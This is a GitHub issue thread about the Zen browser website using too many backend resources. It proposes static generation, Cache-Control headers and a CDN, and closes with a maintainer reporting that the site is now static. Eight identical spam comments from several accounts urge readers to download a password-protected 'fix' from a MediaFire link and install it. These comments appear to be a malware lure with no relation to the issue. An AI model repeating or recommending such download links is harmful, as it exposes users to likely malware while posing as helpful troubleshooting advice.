### ISSUE TITLE
Website "hungry" by design

### ISSUE THREAD

**Issue by tysonclugg** [zen-browser/www#116]
Issues over the last few days (#79 #113 #115 and possibly others) are indicative that the backend consumes too many resources to support a large volume of visitors.

Without having details of which resource limits are being exhausted, it's difficult to make recommendations aside from those below.

## 1. Static Site Generation (SSG)

I strongly suggest ([as do others](https://news.ycombinator.com/item?id=29691934#29696762)) that the site move immediately moves to static content (via SSG) using long cache expiry times for the bulk of content, including:
- The home page and all top level links.
- Any content used by the browser directly such as welcome pages, theme installation files, etc.

I understand that currently theme requests are going via [an API endpoint](https://github.com/zen-browser/www/blob/530f69cd6cd7b1121fabd077b45b202ae1750a17/src/app/api/get-theme/route.ts#L20), this seems to be unsustainable and changes may need to be made moving towards something that works without any server-side processing.

## 2. Cache-Control

As a stop-gap measure until SSG is in place, it may be useful to set the [`Cache-Control` response header](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control) via the [`next.config.js` file](https://vercel.com/guides/how-to-configure-the-cache-control-response-header-in-vercel-projects#using-the-next.config.js-file) per route in [`next.config.mjs`](https://github.com/zen-browser/www/blob/main/next.config.mjs).

## 3. Use Cloudflare CDN
Cloudflare have a bit of a rep for forcing people onto expensive plans, but it's hard to deny that [unlimited bandwidth on their free plan](https://webmasters.stackexchange.com/questions/88659/how-can-cloudflare-offer-a-free-cdn-with-unlimited-bandwidth) would be pretty handy right now. Worthy of note is that the [Cloudflare CDN respects the origin `Cache-Control` header by default](https://developers.cloudflare.com/cache/concepts/cache-control/).

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by matdave** [comment]
@mauro-balades I believe you are referencing that you are hosting external assets vis jsdelivr CDN. I believe the recommendation is to proxy the domain through Cloudflare CDN, as that will provide better deliverability of the site pages themselves.

**Comment by mauro-balades** [comment]
Should be fixed now... No server functions... using jsdelivr cdn... fully static website... I think it's very good now
